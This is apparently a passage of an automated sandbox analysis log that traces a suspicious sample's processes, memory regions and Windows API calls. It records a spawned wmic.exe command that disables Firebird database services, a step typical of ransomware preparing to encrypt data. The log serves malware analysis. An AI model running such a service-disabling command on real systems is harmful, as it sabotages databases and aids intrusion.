start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3290 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3291 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3292 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3293 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3294 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3295 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3296 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3297 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3298 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 236 os_tid = 0xebc Thread: id = 237 os_tid = 0xec0 Thread: id = 238 os_tid = 0xec4 Process: id = "51" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x6b2b5000" os_pid = "0xed4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0xeb0" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3312 start_va = 0x440000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3313 start_va = 0x460000 end_va = 0x461fff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3314 start_va = 0x470000 end_va = 0x483fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3315 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 3316 start_va = 0x4d0000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3317 start_va = 0x510000 end_va = 0x513fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 3318 start_va = 0x520000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3319 start_va = 0x530000 end_va = 0x531fff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3320 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 3321 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 3322 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3323 start_va = 0x7ed60000 end_va = 0x7ed82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed60000" filename = "" Region: id = 3324 start_va = 0x7ed89000 end_va = 0x7ed89fff entry_point = 0x0 region_type = private name = "private_0x000000007ed89000" filename = "" Region: id = 3325 start_va = 0x7ed8c000 end_va = 0x7ed8efff entry_point = 0x0 region_type = private name = "private_0x000000007ed8c000" filename = "" Region: id = 3326 start_va = 0x7ed8f000 end_va = 0x7ed8ffff entry_point = 0x0 region_type = private name = "private_0x000000007ed8f000" filename = "" Region: id = 3327 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3328 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3329 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 3330 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3331 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 3332 start_va = 0x6f0000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3333 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3334 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3335 start_va = 0x830000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 3336 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3337 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3338 start_va = 0x450000 end_va = 0x453fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 3339 start_va = 0x540000 end_va = 0x5fdfff entry_point = 0x540000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3340 start_va = 0x600000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3341 start_va = 0x640000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3342 start_va = 0xad0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 3343 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3344 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3345 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3346 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3347 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3348 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3349 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3350 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3351 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3352 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3353 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3354 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3355 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3356 start_va = 0x7ec60000 end_va = 0x7ed5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec60000" filename = "" Region: id = 3357 start_va = 0x7ed86000 end_va = 0x7ed88fff entry_point = 0x0 region_type = private name = "private_0x000000007ed86000" filename = "" Region: id = 3358 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3359 start_va = 0x460000 end_va = 0x460fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3360 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3361 start_va = 0x680000 end_va = 0x680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 3362 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3363 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3364 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3365 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3366 start_va = 0xae0000 end_va = 0xe16fff entry_point = 0xae0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3367 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3368 start_va = 0x700000 end_va = 0x7e8fff entry_point = 0x700000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3369 start_va = 0x690000 end_va = 0x693fff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 3370 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 3371 start_va = 0x700000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 3372 start_va = 0x930000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 3373 start_va = 0x700000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 3374 start_va = 0x7f0000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 3375 start_va = 0x930000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 3376 start_va = 0xab0000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 3377 start_va = 0xe20000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 3378 start_va = 0xe20000 end_va = 0xefefff entry_point = 0xe20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3379 start_va = 0xfb0000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 3380 start_va = 0x5370000 end_va = 0x576ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 3381 start_va = 0x6a0000 end_va = 0x6a0fff entry_point = 0x6a0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 3382 start_va = 0x6b0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3383 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3384 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3385 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3386 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3387 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3388 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3389 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3390 start_va = 0x700000 end_va = 0x729fff entry_point = 0x700000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3391 start_va = 0x7b0000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 3392 start_va = 0xfc0000 end_va = 0x1147fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fc0000" filename = "" Region: id = 3393 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3394 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3395 start_va = 0x6d0000 end_va = 0x6dffff entry_point = 0x6d0000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 3396 start_va = 0x1150000 end_va = 0x12d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 3397 start_va = 0x5770000 end_va = 0x6b6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005770000" filename = "" Region: id = 3398 start_va = 0x6e0000 end_va = 0x6e0fff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 3399 start_va = 0x700000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 3400 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 3401 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3402 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3403 start_va = 0x6b70000 end_va = 0x6cdffff entry_point = 0x0 region_type = private name = "private_0x0000000006b70000" filename = "" Region: id = 3404 start_va = 0x710000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 3405 start_va = 0x930000 end_va = 0x9e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 3406 start_va = 0xa00000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 3407 start_va = 0x710000 end_va = 0x713fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 3408 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3409 start_va = 0x6b70000 end_va = 0x6c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000006b70000" filename = "" Region: id = 3410 start_va = 0x6cd0000 end_va = 0x6cdffff entry_point = 0x0 region_type = private name = "private_0x0000000006cd0000" filename = "" Region: id = 3411 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3412 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3413 start_va = 0x720000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 3414 start_va = 0x760000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 3415 start_va = 0xa10000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 3416 start_va = 0xa50000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 3417 start_va = 0xf00000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 3418 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 3419 start_va = 0x7ec5a000 end_va = 0x7ec5cfff entry_point = 0x0 region_type = private name = "private_0x000000007ec5a000" filename = "" Region: id = 3420 start_va = 0x7ec5d000 end_va = 0x7ec5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ec5d000" filename = "" Region: id = 3421 start_va = 0x7ed83000 end_va = 0x7ed85fff entry_point = 0x0 region_type = private name = "private_0x000000007ed83000" filename = "" Region: id = 3422 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3423 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3424 start_va = 0x7c0000 end_va = 0x7d4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 3425 start_va = 0x7c0000 end_va = 0x7e8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Thread: id = 240 os_tid = 0xed8 [0113.591] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0113.591] __set_app_type (_Type=0x1) [0113.591] __p__fmode () returned 0x77ac4d6c [0113.591] __p__commode () returned 0x77ac5b1c [0113.591] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0113.591] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0113.592] ??0CHString@@QAE@XZ () returned 0x13495ec [0113.592] ??0CHString@@QAE@XZ () returned 0x13498fc [0113.592] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0113.592] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0113.592] _onexit (_Func=0x1340a20) returned 0x1340a20 [0113.592] _onexit (_Func=0x1340a30) returned 0x1340a30 [0113.592] _onexit (_Func=0x1340a50) returned 0x1340a50 [0113.592] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.592] ResolveDelayLoadedAPI () returned 0x770fcd50 [0113.593] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0113.595] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0113.601] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0x836ed8) returned 0x0 [0113.614] GetCurrentProcess () returned 0xffffffff [0113.614] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x50f674 | out: TokenHandle=0x50f674*=0x158) returned 1 [0113.614] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x50f670 | out: TokenInformation=0x0, ReturnLength=0x50f670) returned 0 [0113.614] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0xad3a38, TokenInformationLength=0x118, ReturnLength=0x50f670 | out: TokenInformation=0xad3a38, ReturnLength=0x50f670) returned 1 [0113.614] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0xad3a38*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0113.614] CloseHandle (hObject=0x158) returned 1 [0113.615] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.617] _vsnwprintf (in: _Buffer=0xad3ac8, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x50f5fc | out: _Buffer="ms_409") returned 6 